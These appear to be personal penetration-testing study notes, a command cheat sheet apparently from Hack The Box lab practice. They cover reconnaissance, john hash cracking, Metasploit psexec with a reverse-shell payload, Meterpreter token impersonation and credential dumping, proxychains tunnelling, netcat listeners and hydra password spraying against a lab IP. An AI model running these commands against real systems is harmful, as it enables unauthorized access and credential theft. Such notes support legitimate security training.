theHarvester

-d [domain to search] e.g microsoft.com
-l [length] e.g 50
-b [source for searching] e.g duckduckgo

---------------------------------------------
crt.sh

search sub-domains and more info

---------------------------------------------
wappalyzer

firefox extension to see what tecnologies websites are using

---------------------------------------------
whatweb

identifies web technologies but in terminal

-v --verbose

----------------------------------------------
nmap

Allows to sweep ip's and ports

-T [speed of scanning] e.g -T3
-p [ports to search] e.g -p500,200,150
-A [do everything in a sweep]

-oN <file> [Save scan to a file]

Also has some premade scripts

--script=[script] e.g --script=ssl-enum-ciphers <site>

it shows the state and grade of ciphers used in the website

------------------------------------------------
john
hash-identifier

cracks hashes and password
checks potential hash used

--list=formats [shows all available hashing formats supported]
--list=formats | grep -i --color <hash> [show all hashes indicated in color]

john --format=Raw-SHA256 <file> Tries to crack the password with the specified format
john --format=Raw-SHA256 --mask="?l" --min-length=n --max-length=n <file> Tries to crack password with a specified min and max length
john --format=Raw-SHA256 --wordlist=<path-to-wordlist> <file> Tries to crack password with the help of a file text with commom passwords 

---------------------------------------------------
wireshark

Use to check connections "three way handshake" ACK, SYN, SYN/ACK

---------------------------------------------------
nessus

An application to search ports and other info from a specified host

----------------------------------------------------
msfconsole (metasploit)

an exploitation tool 

show -all [list of all available tools]
search <tool> [search a specific tool]

use [to select and specific tool]

exploit [perform the exploit]

for payloads

use <exploit tool>
set payload <payload> e.g: linux/x86/shell_reverse_tcp

*******************************************************
IMPORTANT METASPLOIT TOOLS AND EXPLOITS

use keyword 'set' to choose a specific option

exploit windows/smb/psexec
required:
    rhosts < target ip>
    smbdomain <domain>
    smbpass <password>
    smbuser <username>
    target <select target from 0 to 4>

posr/mult/recon/local_exploit suggester
    required:
        session <an open session>

    possible exploits


METERPRETER

use 'background' to put meterpreter in the background
sessions [see all availabe sessions]
sessions <i> [return to the i meterpreter session]

getuid [get current user]
sysinfo [get current system info]

load incognito
list_tokens -u [list tokens only by userss]
list_tokens -g [list tokenes by group]

impersonate_token <user_token>¨

load kiwi
creds_all [obtains all credentials]

*******************************************************
----------------------------------------------------
gobuster

An application to seach files, directories, subdomains and miscellaneous within a ip adress

sudo gobuster dir -e -u http://192.168.1.147 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.txt,.html

sudo gobuster vhost -u http://thetoppers.htb --apend-domain -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt 

-------------------------------------------------------
cvedetails (website)

website full of known vulnerabilities

--------------------------------------------------------
ftp connections (file transfer protocol)

ftp <ip> [establish connection]
if user is "anonymous" no password is required

230 status code is login succesfull
lcd <path> [choose the destinations of downloaded files]
get <object> [download a specific file from the ftp server]

---------------------------------------------------------
smb connection (server message block)

smbclient -L <ip> [list all directories of the smb client]
smbclient //<ip>/<directory>
get <object> [download items]
more <file> [(inside the smb cliente) to cat files]

smbclient -L <ip> -U <username>

---------------------------------------------------------
ssh connections

To connect to a existing ssh server

<user@ip> [you have to specify the user you want to connect to the server and the ip host]
-p [in what port you are connecting (default is 22)]

Dynamic port forwarding

this if for transferring trafic from a specific port on the remote server, allowing us to use
services like we were on our local machine

-D [to specify that we are using Dynamic port forwarding]
<port> [port we want to redirect the trafic]

ssh -D <port> name@ip
ssh -D 1234 raul@1.1.1.1

In order for this work we need proxychains enable

sudo apt install proxychains

we need to modify the conf file to suit our needs
/etc/proxychains.conf

at the end of the file we specify the ip for tunneling
ip port

in order to connect succesfully to the db, we'll use the next sentence
proxychains psql -U username -h target ip || host -p <port number>

--------------------------------------------------------

hosts names are found in /etc/hosts

---------------------------------------------------------
git

git config --global user.name "user name"
git config --global user.email "email@domain.com"

set up an existing repo to a another location

git remote add <repo_name> <repo_url>
git pull <repo_name> main

----------------------------------------------------------
netcat (nc)

nc <ip> <port> [to establish connection]
nc -lvp <port> [listen the desired port]

----------------------------------------------------------
crackmapexec

looks for smb logins using the specified target

smb [search smb]
ip [target]
-u [username]
-p ['actual password']
-d [domain]

---------------------------------------------------
hydra

password spraying

-l [specify user to try passwords]
-L [specify a list of users with a text file]
-p [the password you want to check against]
<ip> [the ip target]
service [ssh, ftp, etc.]

hydra -L users.txt -p 'funnel123#!#' 10.129.228.195 ssh